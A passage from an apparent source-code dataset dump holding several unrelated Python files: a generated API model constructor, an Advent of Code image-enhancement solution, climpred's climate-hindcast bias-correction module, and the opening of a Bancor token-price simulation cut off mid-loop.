        # FIX: pop the meta keyword arguments *before* extracting ``value`` so
        # that ``_path_to_item`` is always defined; the generated original
        # popped them afterwards and raised NameError (instead of the intended
        # ApiTypeError) when ``value`` was missing.
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        if 'value' in kwargs:
            value = kwargs.pop('value')
        elif args:
            args = list(args)
            value = args.pop(0)
        else:
            raise ApiTypeError(
                "value is required, but not passed in args or kwargs and doesn't have default",
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )
        if args:
            raise ApiTypeError(
                "Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
                    args,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
        self.value = value
        if kwargs:
            raise ApiTypeError(
                "Invalid named arguments=%s passed to %s. Remove those invalid named arguments." % (
                    kwargs,
                    self.__class__.__name__,
                ),
                path_to_item=_path_to_item,
                valid_classes=(self.__class__,),
            )
| 38.306011 | 124 | 0.571041 |
7955409ebbeb9aa3f1040f132a9694e59f1f239a | 501 | py | Python | 20.trench-map/py/part2.py | rolandbernard/adventofcode-2021 | 9249815af62d0fcf79b71357330a1456ea3be1ed | [
"BSD-2-Clause"
] | null | null | null | 20.trench-map/py/part2.py | rolandbernard/adventofcode-2021 | 9249815af62d0fcf79b71357330a1456ea3be1ed | [
"BSD-2-Clause"
] | null | null | null | 20.trench-map/py/part2.py | rolandbernard/adventofcode-2021 | 9249815af62d0fcf79b71357330a1456ea3be1ed | [
"BSD-2-Clause"
] | null | null | null |
import sys
import numpy as np
from scipy.ndimage import convolve
# Puzzle input from stdin: the 512-entry enhancement algorithm and the start
# image, separated by a blank line; '#' pixels map to 1, '.' pixels to 0.
rawalgo, rawimg = sys.stdin.read().strip().split('\n\n')
algo = np.array([1 if c == '#' else 0 for c in rawalgo])
img = np.array([[1 if c == '#' else 0 for c in line] for line in rawimg.split('\n')])
# Kernel of powers of two: each 3x3 neighbourhood folds into a 9-bit index
# into the algorithm lookup table. (Renamed from ``bin``, which shadowed the
# builtin of the same name.)
KERNEL = 2**np.arange(9).reshape(3, 3)
def enhance(img, algo):
    """One enhancement step: pad by replicating the edge (the uniform infinite
    background), then map every 9-bit neighbourhood through *algo*."""
    padded = np.pad(img, 1, 'edge')
    return algo[convolve(padded, KERNEL)]
# Pad once so edge replication inside enhance() models the infinite background,
# then run 50 enhancement rounds (part 2) and count lit pixels.
img = np.pad(img, 1)
for _ in range(50):
    img = enhance(img, algo)
print("Result:", img.sum())
| 20.875 | 85 | 0.622754 |
79554166d18801777cfbef014f858ab86a0d6ff8 | 28,809 | py | Python | climpred/bias_removal.py | pangeo-data/climpred | 8df537f4a3740441dba55e018ce65e1b6d977162 | [
"MIT"
] | 104 | 2020-09-17T16:46:37.000Z | 2022-03-29T16:49:44.000Z | climpred/bias_removal.py | pangeo-data/climpred | 8df537f4a3740441dba55e018ce65e1b6d977162 | [
"MIT"
] | 303 | 2020-09-17T16:05:24.000Z | 2022-03-28T19:59:31.000Z | climpred/bias_removal.py | pangeo-data/climpred | 8df537f4a3740441dba55e018ce65e1b6d977162 | [
"MIT"
] | 18 | 2020-10-08T15:40:42.000Z | 2022-03-29T19:07:54.000Z | import logging
import warnings
import numpy as np
import pandas as pd
import xarray as xr
from bias_correction import XBiasCorrection
from xclim import sdba
from xskillscore.core.utils import suppress_warnings
from .constants import BIAS_CORRECTION_BIAS_CORRECTION_METHODS, GROUPBY_SEASONALITIES
from .metrics import Metric
from .options import OPTIONS
from .utils import (
convert_cftime_to_datetime_coords,
convert_time_index,
get_lead_cftime_shift_args,
shift_cftime_singular,
)
def sub(a, b):
    """Additive-bias operator: return ``a - b``."""
    difference = a - b
    return difference
def div(a, b):
    """Multiplicative-bias operator: return ``a / b``."""
    quotient = a / b
    return quotient
def leave_one_out(bias, dim):
    """Leave-one-out along *dim*, stacking the folds on a new 'sample' dimension.

    Each fold drops one element of *dim* and is reindexed back onto the full
    coordinate, so the held-out position is filled with NaN.
    See also: https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.LeaveOneOut.html"""
    bias_nan = []
    for i in range(bias[dim].size):
        bias_nan.append(
            bias.drop_isel({dim: i}).reindex({dim: bias[dim]}).rename({dim: "sample"})
        )
    bias_nan = xr.concat(bias_nan, dim).assign_coords({dim: bias[dim]})
    return bias_nan
def leave_one_out_drop(bias, dim):
    """Leave-one-out along *dim* without reindexing: each fold keeps only the
    remaining ``size - 1`` elements, stacked on a new integer 'sample' dimension.
    See also: https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.LeaveOneOut.html."""
    bias_nan = []
    for i in range(bias[dim].size):
        bias_nan.append(bias.drop_isel({dim: i}).rename({dim: "sample"}).drop("sample"))
    bias_nan = xr.concat(bias_nan, dim).assign_coords(
        {dim: bias[dim], "sample": np.arange(bias[dim].size - 1)}
    )
    return bias_nan
def _mean_bias_removal_func(hind, bias, dim, how):
    """Quick removal of mean bias over all initializations without cross validation.

    Args:
        hind (xr.object): hindcast.
        bias (xr.object): bias.
        dim (str): Time dimension name in bias.
        how (str): 'additive' (subtract the bias) or anything else (divide by it).

    Returns:
        xr.object: bias removed hind
    """
    how_operator = sub if how == "additive" else div
    seasonality = OPTIONS["seasonality"]
    with xr.set_options(keep_attrs=True):
        if seasonality == "weekofyear":
            # convert to datetime for weekofyear operations
            hind = convert_cftime_to_datetime_coords(hind, dim)
            bias = convert_cftime_to_datetime_coords(bias, dim)
        hind_groupby = f"{dim}.{seasonality}"
        # Remove the seasonal-group mean bias from each matching group.
        bias_removed_hind = how_operator(
            hind.groupby(hind_groupby),
            bias.groupby(hind_groupby).mean(),
        )
    bias_removed_hind.attrs = hind.attrs
    # convert back to CFTimeIndex if needed
    if isinstance(bias_removed_hind[dim].to_index(), pd.DatetimeIndex):
        bias_removed_hind = convert_time_index(bias_removed_hind, dim, "hindcast")
    return bias_removed_hind
def _multiplicative_std_correction(hind, spread, dim, obs=None):
    """Quick removal of std bias over all initializations without cross validation.

    Rescales the ensemble so its seasonal-group spread matches the observed
    standard deviation, while keeping the ensemble-mean signal.

    Args:
        hind (xr.object): hindcast.
        spread (xr.object): model spread.
        dim (str): Time dimension name in bias.
        obs (xr.object): observations

    Returns:
        xr.object: bias removed hind
    """
    seasonality = OPTIONS["seasonality"]
    if seasonality == "weekofyear":
        # convert to datetime for weekofyear operations
        hind = convert_cftime_to_datetime_coords(hind, "init")
        spread = convert_cftime_to_datetime_coords(spread, "init")
        obs = convert_cftime_to_datetime_coords(obs, "time")
    init_groupby = f"init.{seasonality}"
    obs_groupby = f"time.{seasonality}"
    with xr.set_options(keep_attrs=True):
        model_mean_spread = spread.groupby(init_groupby).mean()
        model_member_mean = hind.mean("member").groupby(init_groupby).mean()
        # assume that no trend here
        obs_spread = obs.groupby(obs_groupby).std()
        # z distr: standardize each member anomaly by the model spread.
        init_z = (hind.groupby(init_groupby) - model_member_mean).groupby(
            init_groupby
        ) / model_mean_spread
        # scale with obs_spread and model mean
        init_std_corrected = (init_z.groupby(init_groupby) * obs_spread).groupby(
            init_groupby
        ) + model_member_mean
    init_std_corrected.attrs = hind.attrs
    # convert back to CFTimeIndex if needed
    if isinstance(init_std_corrected.init.to_index(), pd.DatetimeIndex):
        init_std_corrected = convert_time_index(init_std_corrected, "init", "hindcast")
    return init_std_corrected
def _std_multiplicative_bias_removal_func_cv(hind, spread, dim, obs, cv="LOO"):
    """Remove std bias from all but the given initialization (cross-validation).

    .. note::
        This method follows Jolliffe 2011. For a given initialization, bias is computed
        over all other initializations, excluding the one in question. This calculated
        bias is removed from the given initialization, and then the process proceeds to
        the following one.

    Args:
        hind (xr.object): hindcast.
        spread (xr.object): model spread.
        dim (str): Time dimension name in bias.
        obs (xr.object): observations.
        cv (str): cross-validation style; only "LOO" is implemented here.
            NOTE(review): the argument is currently not checked inside the body.

    Returns:
        xr.object: bias removed hind

    Reference:
        * Jolliffe, Ian T., and David B. Stephenson. Forecast Verification: A
          Practitioner's Guide in Atmospheric Science. Chichester, UK: John Wiley &
          Sons, Ltd, 2011. https://doi.org/10.1002/9781119960003., Chapter: 5.3.1, p.80
    """
    seasonality = OPTIONS["seasonality"]
    if seasonality == "weekofyear":
        # convert to datetime for weekofyear operations
        hind = convert_cftime_to_datetime_coords(hind, "init")
        spread = convert_cftime_to_datetime_coords(spread, "init")
        obs = convert_cftime_to_datetime_coords(obs, "time")
    bias_removed_hind = []
    for init in hind.init.data:
        # Statistics are computed on all inits except the held-out one.
        hind_drop_init = hind.drop_sel(init=init).init
        with xr.set_options(keep_attrs=True):
            init_groupby = f"init.{seasonality}"
            time_groupby = f"time.{seasonality}"
            model_mean_spread = (
                spread.sel(init=hind_drop_init).groupby(init_groupby).mean()
            )
            model_member_mean = (
                hind.drop_sel(init=init).mean("member").groupby(init_groupby).mean()
            )
            # assume that no trend here
            obs_spread = obs.groupby(time_groupby).std()
            # z distr
            init_z = (
                hind.sel(init=[init]).groupby(init_groupby) - model_member_mean
            ).groupby(init_groupby) / model_mean_spread
            # scale with obs_spread and model mean
            init_std_corrected = (init_z.groupby(init_groupby) * obs_spread).groupby(
                init_groupby
            ) + model_member_mean
            bias_removed_hind.append(init_std_corrected)
    init_std_corrected = xr.concat(bias_removed_hind, "init")
    init_std_corrected.attrs = hind.attrs
    # convert back to CFTimeIndex if needed
    if isinstance(init_std_corrected.init.to_index(), pd.DatetimeIndex):
        init_std_corrected = convert_time_index(init_std_corrected, "init", "hindcast")
    return init_std_corrected
def _mean_bias_removal_func_cv(hind, bias, dim, how, cv="LOO"):
    """Remove mean bias from all but the given initialization (cross-validation).

    .. note::
        This method follows Jolliffe 2011. For a given initialization, bias is computed
        over all other initializations, excluding the one in question. This calculated
        bias is removed from the given initialization, and then the process proceeds to
        the following one.

    Args:
        hind (xr.object): hindcast.
        bias (xr.object): bias.
        dim (str): Time dimension name in bias.
        how (str): additive or multiplicative bias.
        cv (str): cross-validation style; only "LOO" is implemented.

    Returns:
        xr.object: bias removed hind

    Reference:
        * Jolliffe, Ian T., and David B. Stephenson. Forecast Verification: A
          Practitioner's Guide in Atmospheric Science. Chichester, UK: John Wiley &
          Sons, Ltd, 2011. https://doi.org/10.1002/9781119960003., Chapter: 5.3.1, p.80
    """
    how_operator = sub if how == "additive" else div
    seasonality = OPTIONS["seasonality"]
    bias = bias.rename({dim: "init"})
    bias_removed_hind = []
    logging.info(f"mean {how} bias removal with seasonality {seasonality}:")
    if seasonality == "weekofyear":
        # convert to datetime for weekofyear operations
        hind = convert_cftime_to_datetime_coords(hind, "init")
        bias = convert_cftime_to_datetime_coords(bias, "init")
    if cv == "LOO":
        for init in hind.init.data:
            # Bias for this init is the group mean over all *other* inits.
            hind_drop_init = hind.drop_sel(init=init).init
            with xr.set_options(keep_attrs=True):
                init_groupby = f"init.{seasonality}"
                init_bias_removed = how_operator(
                    hind.sel(init=[init]).groupby(init_groupby),
                    bias.sel(
                        init=hind_drop_init.to_index().intersection(
                            bias.init.to_index()
                        )
                    )
                    .groupby(init_groupby)
                    .mean(),
                )
                if seasonality in init_bias_removed.coords:
                    del init_bias_removed.coords[seasonality]
            bias_removed_hind.append(init_bias_removed)
        bias_removed_hind = xr.concat(bias_removed_hind, "init")
    else:
        raise NotImplementedError(f'try cv="LOO", found {cv}')
    bias_removed_hind.attrs = hind.attrs
    # convert back to CFTimeIndex if needed
    if isinstance(bias_removed_hind.init.to_index(), pd.DatetimeIndex):
        bias_removed_hind = convert_time_index(bias_removed_hind, "init", "hindcast")
    return bias_removed_hind
def gaussian_bias_removal(
    hindcast,
    alignment,
    cv=False,
    how="additive_mean",
    train_test_split="fair",
    train_time=None,
    train_init=None,
    **metric_kwargs,
):
    """Calc bias based on OPTIONS['seasonality'] and remove bias from py:class:`~climpred.classes.HindcastEnsemble`.

    Args:
        hindcast (HindcastEnsemble): hindcast.
        alignment (str): which inits or verification times should be aligned?

            - maximize/None: maximize the degrees of freedom by slicing ``hind`` and
              ``verif`` to a common time frame at each lead.
            - same_inits: slice to a common init frame prior to computing
              metric. This philosophy follows the thought that each lead should be
              based on the same set of initializations.
            - same_verif: slice to a common/consistent verification time frame prior
              to computing metric. This philosophy follows the thought that each lead
              should be based on the same set of verification dates.

        how (str): what kind of bias removal to perform. Select
            from ['additive_mean', 'multiplicative_mean', 'multiplicative_std'].
            Defaults to 'additive_mean'.
        cv (bool or str): use cross validation in the bias removal function?

            - True / 'LOO': leave-one-out cross validation, i.e. exclude the
              given initialization from the bias calculation.
            - False: include the given initialization in the calculation, which
              is much faster and yields similar skill with a large N of
              initializations.

            Defaults to ``False`` (the signature default; an earlier docstring
            incorrectly stated ``True``).
        train_test_split (str): 'fair' estimates the bias on ``train_init`` /
            ``train_time`` only and corrects the remaining inits;
            'unfair' / 'unfair-cv' train and correct on the full hindcast.
        train_init: inits used for training when ``train_test_split='fair'``
            and ``alignment`` in ['same_inits', 'maximize'].
        train_time: verification times used for training when
            ``train_test_split='fair'`` and ``alignment='same_verif'``.
        **metric_kwargs: passed on to ``hindcast.verify`` when computing the
            mean bias.

    Returns:
        HindcastEnsemble: bias removed hindcast.
    """
    if train_test_split == "fair":
        # Split into a training copy (used to estimate the bias) and a test
        # copy (the inits that actually get corrected).
        hindcast_train = hindcast.copy()
        hindcast_test = hindcast.copy()
        if alignment in ["same_inits", "maximize"]:
            hindcast_train._datasets["initialized"] = hindcast.get_initialized().sel(
                init=train_init
            )  # for bias
            hindcast_test._datasets[
                "initialized"
            ] = hindcast.get_initialized().drop_sel(
                init=train_init
            )  # to reduce bias
        if alignment in ["same_verif"]:
            train_time = hindcast.coords["time"].sel(time=train_time).to_index()
            # add inits before lead.max()
            n, freq = get_lead_cftime_shift_args(
                hindcast.coords["lead"].attrs["units"], hindcast.coords["lead"].max()
            )
            train_time_init = train_time.union(train_time.shift(-n, freq)).intersection(
                hindcast.coords["init"].to_index()
            )
            hindcast_train._datasets["initialized"] = hindcast.get_initialized().sel(
                init=train_time_init
            )
            hindcast_test._datasets[
                "initialized"
            ] = hindcast.get_initialized().drop_sel(init=train_time_init)
    else:
        # 'unfair' / 'unfair-cv': train and correct on the same data.
        assert train_test_split in ["unfair", "unfair-cv"]
        hindcast_train = hindcast
        hindcast_test = hindcast
    if "mean" in how:
        # calculate bias lead-time dependent
        bias = hindcast_train.verify(
            metric="unconditional_bias" if how == "additive_mean" else "mul_bias",
            comparison="e2o",
            dim=[],  # not used by bias func, therefore best to add [] here
            alignment=alignment,
            **metric_kwargs,
        )
    if how == "multiplicative_std":
        # member spread serves as the std estimate to be corrected
        bias = hindcast_train.verify(
            metric="spread",
            comparison="m2o",
            dim="member",
            alignment=alignment,
        )
    # NOTE(review): `bias` is only assigned for the three supported `how`
    # values; any other value raises NameError on the next line.
    bias = bias.drop("skill")
    # how to remove bias
    if "mean" in how:
        if cv in [False, None]:
            bias_removal_func = _mean_bias_removal_func
            bias_removal_func_kwargs = dict(how=how.split("_")[0])
        else:
            bias_removal_func = _mean_bias_removal_func_cv
            bias_removal_func_kwargs = dict(how=how.split("_")[0], cv=cv)
    elif how == "multiplicative_std":
        if cv in [False, None]:
            bias_removal_func = _multiplicative_std_correction
            bias_removal_func_kwargs = dict(
                obs=hindcast.get_observations(),
            )
        else:
            bias_removal_func = _std_multiplicative_bias_removal_func_cv
            bias_removal_func_kwargs = dict(obs=hindcast.get_observations(), cv=cv)
    bias_removed_hind = bias_removal_func(
        hindcast_test.get_initialized(), bias, "init", **bias_removal_func_kwargs
    )
    bias_removed_hind = bias_removed_hind.squeeze(drop=True)
    # remove groupby label from coords
    for c in GROUPBY_SEASONALITIES + ["skill"]:
        if c in bias_removed_hind.coords and c not in bias_removed_hind.dims:
            del bias_removed_hind.coords[c]
    # replace raw with bias reducted initialized dataset
    hindcast_bias_removed = hindcast.copy()
    hindcast_bias_removed._datasets["initialized"] = bias_removed_hind
    return hindcast_bias_removed
def bias_correction(
    hindcast,
    alignment,
    cv=False,
    how="normal_mapping",
    train_test_split="fair",
    train_time=None,
    train_init=None,
    **metric_kwargs,
):
    """Calc bias based on OPTIONS['seasonality'] and remove bias from py:class:`~climpred.classes.HindcastEnsemble`.

    Args:
        hindcast (HindcastEnsemble): hindcast.
        alignment (str): which inits or verification times should be aligned?

            - maximize/None: maximize the degrees of freedom by slicing ``hind`` and
              ``verif`` to a common time frame at each lead.
            - same_inits: slice to a common init frame prior to computing
              metric. This philosophy follows the thought that each lead should be
              based on the same set of initializations.
            - same_verif: slice to a common/consistent verification time frame prior
              to computing metric. This philosophy follows the thought that each lead
              should be based on the same set of verification dates.

        how (str): name of the correction method handed to
            ``XBiasCorrection.correct`` (bias_correction package), e.g.
            'normal_mapping'. Defaults to 'normal_mapping'. (An earlier
            docstring listed the gaussian ``*_mean``/``*_std`` options, which
            belong to :func:`gaussian_bias_removal` instead.)
        cv (bool or str): cross validation is only applied with
            ``train_test_split='unfair-cv'`` and ``cv='LOO'`` (leave-one-out).
            With ``False`` the given initialization is included in the
            training, which is much faster but yields similar skill with a
            large N of initializations. Defaults to ``False``.
        train_test_split (str): 'fair' corrects only inits/times not used for
            training; 'unfair' / 'unfair-cv' train and correct on all data.
        train_init: training inits for ``alignment`` in
            ['same_inits', 'maximize'] with ``train_test_split='fair'``.
        train_time: training verification times for ``alignment='same_verif'``
            with ``train_test_split='fair'``.
        **metric_kwargs: passed on to ``XBiasCorrection.correct``.

    Returns:
        HindcastEnsemble: bias removed hindcast.
    """

    def bc_func(
        forecast,
        observations,
        dim=None,
        method=how,
        cv=False,
        **metric_kwargs,
    ):
        """Wrapping https://github.com/pankajkarman/bias_correction/blob/master/bias_correction.py.

        Functions to perform bias correction of datasets to remove biases across datasets. Implemented methods include:

        - quantile mapping: https://rmets.onlinelibrary.wiley.com/doi/pdf/10.1002/joc.2168)
        - modified quantile mapping: https://www.sciencedirect.com/science/article/abs/pii/S0034425716302000?via%3Dihub
        - scaled distribution mapping (Gamma and Normal Corrections): https://www.hydrol-earth-syst-sci.net/21/2649/2017/
        """
        corrected = []
        seasonality = OPTIONS["seasonality"]
        # the correction always operates along the verification time axis
        dim = "time"
        if seasonality == "weekofyear":
            # convert to datetime for weekofyear operations
            forecast = convert_cftime_to_datetime_coords(forecast, dim)
            observations = convert_cftime_to_datetime_coords(observations, dim)
        if train_test_split in ["fair"]:
            if alignment in ["same_inits", "maximize"]:
                train_dim = train_init.rename({"init": "time"})
                # shift init to time
                n, freq = get_lead_cftime_shift_args(
                    forecast.lead.attrs["units"], forecast.lead
                )
                train_dim = shift_cftime_singular(train_dim[dim], n, freq)
                data_to_be_corrected = forecast.drop_sel({dim: train_dim})
            elif alignment in ["same_verif"]:
                train_dim = train_time
                intersection = (
                    train_dim[dim].to_index().intersection(forecast[dim].to_index())
                )
                data_to_be_corrected = forecast.drop_sel({dim: intersection})
            # training slice: times present in both train_dim and forecast
            intersection = (
                train_dim[dim].to_index().intersection(forecast[dim].to_index())
            )
            forecast = forecast.sel({dim: intersection})
            reference = observations.sel({dim: intersection})
        else:
            model = forecast
            data_to_be_corrected = forecast
            reference = observations
        data_to_be_corrected_ori = data_to_be_corrected.copy()
        # fit and apply the correction separately per seasonal group
        for label, group in forecast.groupby(f"{dim}.{seasonality}"):
            reference = observations.sel({dim: group[dim]})
            model = forecast.sel({dim: group[dim]})
            if train_test_split in ["unfair", "unfair-cv"]:
                # take all
                data_to_be_corrected = forecast.sel({dim: group[dim]})
            else:
                # only the held-out times that belong to this seasonal label
                group_dim_data_to_be_corrected = (
                    getattr(data_to_be_corrected_ori[dim].dt, seasonality) == label
                )
                data_to_be_corrected = data_to_be_corrected_ori.sel(
                    {dim: group_dim_data_to_be_corrected}
                )
            if cv == "LOO" and train_test_split == "unfair-cv":
                reference = leave_one_out(reference, dim)
                model = leave_one_out(model, dim)
                data_to_be_corrected = leave_one_out(data_to_be_corrected, dim)
            # fold the member dimension into the correction dimension if present
            dim2 = "time_member"
            if "member" in model.dims:
                reference = reference.broadcast_like(model)
                data_to_be_corrected = data_to_be_corrected.broadcast_like(model)
                model = model.stack({dim2: ["time", "member"]})
                reference = reference.stack({dim2: ["time", "member"]})
                data_to_be_corrected = data_to_be_corrected.stack(
                    {dim2: ["time", "member"]}
                )
            dim_used = dim2 if "member" in forecast.dims else dim
            # using bias-correction: https://github.com/pankajkarman/bias_correction/blob/master/bias_correction.py
            with warnings.catch_warnings():
                warnings.simplefilter("ignore", category=RuntimeWarning)
                bc = XBiasCorrection(
                    reference,
                    model,
                    data_to_be_corrected,
                    dim=dim_used,
                )
                c = bc.correct(method=method, join="outer", **metric_kwargs)
            if dim2 in c.dims:
                c = c.unstack(dim2)
            if cv and dim in c.dims and "sample" in c.dims:
                # collapse leave-one-out samples back onto a single time axis
                c = c.mean(dim)
                c = c.rename({"sample": dim})
            # select only where data_to_be_corrected was input
            if dim2 in data_to_be_corrected.dims:
                data_to_be_corrected = data_to_be_corrected.unstack(dim2)
            c = c.sel({dim: data_to_be_corrected[dim]})
            corrected.append(c)
        corrected = xr.concat(corrected, dim).sortby(dim)
        # convert back to CFTimeIndex if needed
        if isinstance(corrected[dim].to_index(), pd.DatetimeIndex):
            corrected = convert_time_index(corrected, dim, "hindcast")
        return corrected

    # wrap bc_func as a Metric so HindcastEnsemble.verify drives the alignment
    bc = Metric(
        "bias_correction", bc_func, positive=False, probabilistic=False, unit_power=1
    )
    # calculate bias lead-time dependent
    bias_removed_hind = hindcast.verify(
        metric=bc,
        comparison="m2o" if "member" in hindcast.dims else "e2o",
        dim=[],  # set internally inside bc
        alignment=alignment,
        cv=cv,
        **metric_kwargs,
    ).squeeze(drop=True)
    # remove groupby label from coords
    for c in GROUPBY_SEASONALITIES + ["skill"]:
        if c in bias_removed_hind.coords and c not in bias_removed_hind.dims:
            del bias_removed_hind.coords[c]
    # keep attrs
    bias_removed_hind.attrs = hindcast.get_initialized().attrs
    for v in bias_removed_hind.data_vars:
        bias_removed_hind[v].attrs = hindcast.get_initialized()[v].attrs
    # replace raw with bias reducted initialized dataset
    hindcast_bias_removed = hindcast.copy()
    hindcast_bias_removed._datasets["initialized"] = bias_removed_hind
    return hindcast_bias_removed
def xclim_sdba(
    hindcast,
    alignment,
    cv=False,
    how="DetrendedQuantileMapping",
    train_test_split="fair",
    train_time=None,
    train_init=None,
    **metric_kwargs,
):
    """Calc bias based on grouper to be passed as metric_kwargs and remove bias from py:class:`~climpred.classes.HindcastEnsemble`.

    See climpred.constants.XCLIM_BIAS_CORRECTION_METHODS for implemented methods for ``how``.

    Args:
        hindcast (HindcastEnsemble): hindcast.
        alignment (str): which inits or verification times should be aligned?

            - maximize/None: maximize the degrees of freedom by slicing ``hind`` and
              ``verif`` to a common time frame at each lead.
            - same_inits: slice to a common init frame prior to computing
              metric. This philosophy follows the thought that each lead should be
              based on the same set of initializations.
            - same_verif: slice to a common/consistent verification time frame prior
              to computing metric. This philosophy follows the thought that each lead
              should be based on the same set of verification dates.

        how (str): name of the ``xclim.sdba.adjustment`` class to use.
            Defaults to 'DetrendedQuantileMapping'.
        cv (bool or str): cross validation is only applied with
            ``train_test_split='unfair-cv'`` and ``cv='LOO'``. With ``False``
            the given initialization is included in the training, which is
            much faster but yields similar skill with a large N of
            initializations. Defaults to ``False``.
        train_test_split (str): 'fair' corrects only inits/times not used for
            training; 'unfair' / 'unfair-cv' train and correct on all data.
        train_init: training inits for ``alignment`` in
            ['same_inits', 'maximize'] with ``train_test_split='fair'``.
        train_time: training verification times for ``alignment='same_verif'``
            with ``train_test_split='fair'``.
        **metric_kwargs: ``group`` plus 'interp', 'extrapolation' and
            'detrend' are consumed here; the remainder is passed to the
            adjustment's ``train`` classmethod.

    Returns:
        HindcastEnsemble: bias removed hindcast.
    """

    def bc_func(
        forecast,
        observations,
        dim=None,
        method=how,
        cv=False,
        **metric_kwargs,
    ):
        """Wrapping https://github.com/Ouranosinc/xclim/blob/master/xclim/sdba/adjustment.py.

        Functions to perform bias correction of datasets to remove biases across datasets. See climpred.constants.XCLIM_BIAS_CORRECTION_METHODS for implemented methods.
        """
        seasonality = OPTIONS["seasonality"]
        # the correction always operates along the verification time axis
        dim = "time"
        if seasonality == "weekofyear":
            # convert to datetime for weekofyear operations
            forecast = convert_cftime_to_datetime_coords(forecast, dim)
            observations = convert_cftime_to_datetime_coords(observations, dim)
        if train_test_split in ["fair"]:
            if alignment in ["same_inits", "maximize"]:
                train_dim = train_init.rename({"init": "time"})
                # shift init to time
                n, freq = get_lead_cftime_shift_args(
                    forecast.lead.attrs["units"], forecast.lead
                )
                train_dim = shift_cftime_singular(train_dim[dim], n, freq)
                data_to_be_corrected = forecast.drop_sel({dim: train_dim})
            elif alignment in ["same_verif"]:
                train_dim = train_time
                intersection = (
                    train_dim[dim].to_index().intersection(forecast[dim].to_index())
                )
                data_to_be_corrected = forecast.drop_sel({dim: intersection})
            # training slice: times present in both train_dim and forecast
            intersection = (
                train_dim[dim].to_index().intersection(forecast[dim].to_index())
            )
            forecast = forecast.sel({dim: intersection})
            model = forecast
            reference = observations.sel({dim: intersection})
        else:
            model = forecast
            data_to_be_corrected = forecast
            reference = observations
        if train_test_split in ["unfair", "unfair-cv"]:
            # take all
            data_to_be_corrected = forecast
        if cv == "LOO" and train_test_split == "unfair-cv":
            reference = leave_one_out(reference, dim)
            model = leave_one_out(model, dim)
            data_to_be_corrected = leave_one_out(data_to_be_corrected, dim)
        # default grouper from OPTIONS['seasonality']; 'init' renamed to 'time'
        if "group" not in metric_kwargs:
            metric_kwargs["group"] = dim + "." + OPTIONS["seasonality"]
        elif metric_kwargs["group"] is None:
            metric_kwargs["group"] = dim + "." + OPTIONS["seasonality"]
        if "init" in metric_kwargs["group"]:
            metric_kwargs["group"] = metric_kwargs["group"].replace("init", "time")
        if "member" in model.dims:
            metric_kwargs["add_dims"] = ["member"]
            if "member" not in reference.dims:
                reference = reference.expand_dims(member=[model.member[0]])
        # kwargs destined for .adjust() rather than .train()
        adjust_kwargs = {}
        for k in ["interp", "extrapolation", "detrend"]:
            if k in metric_kwargs:
                adjust_kwargs[k] = metric_kwargs.pop(k)

        def adjustment(reference, model, data_to_be_corrected):
            # train the sdba adjustment object on (reference, model), then
            # apply it to the data to be corrected
            dqm = getattr(sdba.adjustment, method).train(
                reference, model, **metric_kwargs
            )
            data_to_be_corrected = dqm.adjust(data_to_be_corrected, **adjust_kwargs)
            return data_to_be_corrected

        # NOTE(review): drops the lead coordinate before training — presumably
        # sdba rejects the extra coord; this also mutates `forecast` in the
        # unfair path since `model is forecast` there. Confirm intended.
        del model.coords["lead"]
        c = xr.Dataset()
        for v in model.data_vars:
            c[v] = adjustment(reference[v], model[v], data_to_be_corrected[v])
        if cv and dim in c.dims and "sample" in c.dims:
            # collapse leave-one-out samples back onto a single time axis
            c = c.mean(dim)
            c = c.rename({"sample": dim})
        # select only where data_to_be_corrected was input
        corrected = c.sel({dim: data_to_be_corrected[dim]})
        # convert back to CFTimeIndex if needed
        if isinstance(corrected[dim].to_index(), pd.DatetimeIndex):
            corrected = convert_time_index(corrected, dim, "hindcast")
        return corrected

    # wrap bc_func as a Metric so HindcastEnsemble.verify drives the alignment
    bc = Metric(
        "bias_correction", bc_func, positive=False, probabilistic=False, unit_power=1
    )
    # calculate bias lead-time dependent
    bias_removed_hind = hindcast.verify(
        metric=bc,
        comparison="m2o" if "member" in hindcast.dims else "e2o",
        dim=[],  # set internally inside bc
        alignment=alignment,
        cv=cv,
        **metric_kwargs,
    ).squeeze(drop=True)
    # remove groupby label from coords
    for c in GROUPBY_SEASONALITIES + ["skill"]:
        if c in bias_removed_hind.coords and c not in bias_removed_hind.dims:
            del bias_removed_hind.coords[c]
    # keep attrs
    bias_removed_hind.attrs = hindcast.get_initialized().attrs
    for v in bias_removed_hind.data_vars:
        bias_removed_hind[v].attrs = hindcast.get_initialized()[v].attrs
    # replace raw with bias reducted initialized dataset
    hindcast_bias_removed = hindcast.copy()
    hindcast_bias_removed._datasets["initialized"] = bias_removed_hind
    return hindcast_bias_removed
| 40.0125 | 168 | 0.632858 |
795542e32271dcef46ba87f8eb306a054dbdfef3 | 4,304 | py | Python | 4cw.py | lisoleg/pybancor | bbec2b9eb650799f965dbc5981025907ecb9da37 | [
"MIT"
] | null | null | null | 4cw.py | lisoleg/pybancor | bbec2b9eb650799f965dbc5981025907ecb9da37 | [
"MIT"
] | null | null | null | 4cw.py | lisoleg/pybancor | bbec2b9eb650799f965dbc5981025907ecb9da37 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import random
slista=[]
blista=[]
plista=[]
splista=[]
jlist=[0,1,2,3]
cwlist=[0.05, 0.075, 0.08, 0.1]
totalyr=3
for j in jlist:
slista.append([])
blista.append([])
plista.append([])
splista.append([])
s0=4.96*10**8
mtop=10*10**8
stop=10**9-s0
oneday=24*60*60
oneyear=365
t=[i for i in range(1,oneyear*2*totalyr)]
bprice=bprice0=45
bprice=bprice0
b0=bnum0=10**6
realmine=0
cw=cwlist[j]
plist=[]
blist=[]
slist=[]
splist=[]
b=b0*1.0
p0=b0/(cw*s0)
percentforbancor=0.08
dotpersec=2
s=1.0*s0
newprice=p=p0
sp=s0*p0
feerate=0.05
allmine=0
buymoney=sellmoney=0
staked=0
toBP=0.5
for i in t:
